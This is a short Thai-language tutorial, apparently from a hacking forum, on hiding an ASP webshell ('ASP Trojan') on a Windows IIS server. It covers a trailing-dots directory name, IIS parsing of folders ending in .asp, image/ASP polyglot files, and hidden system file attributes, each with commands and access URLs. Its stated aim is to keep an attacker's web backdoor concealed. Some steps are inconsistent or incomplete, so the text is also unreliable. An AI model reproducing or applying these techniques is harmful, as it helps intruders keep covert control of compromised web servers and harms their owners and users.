สองวิธีต่อไปนี้สามารถซ่อน asp Trojan ของคุณได้ คุณสามารถทดสอบได้ 1. สร้างไดเร็กทอรีที่ไม่ได้มาตรฐาน: mkdir images../
คัดลอก ASP Trojan ไปยังไดเร็กทอรี: คัดลอก c:/inetpub/wwwroot/dbm6.asp c:/inetpub/wwwroot/images../news.asp
เข้าถึง ASP Trojan ผ่านทางเว็บ: http://ip/images../news.asp?action=login
วิธีลบไดเร็กทอรีที่ไม่เป็นมาตรฐาน: rmdir image../ /s
2. IIS ใน Windows จะแยกวิเคราะห์ไฟล์ในไดเร็กทอรีที่ลงท้ายด้วย .asp เพื่อให้บรรลุวัตถุประสงค์ในการซ่อนแบ็คดอร์หน้าเว็บของเราเอง:
โปรแกรม mkdir.asp
สร้างไฟล์ 1.txt ใหม่โดยมีเนื้อหาดังต่อไปนี้:
สร้างเนื้อหาไฟล์ 12.jpg ใหม่ หรือใช้ไฟล์ที่ผสานกับ GIF และ ASP
attrib +H +S โปรแกรม asp
เข้าถึง ASP หนึ่งประโยคโทรจันผ่านทางเว็บ: http://ip/images/programme.asp/1.txt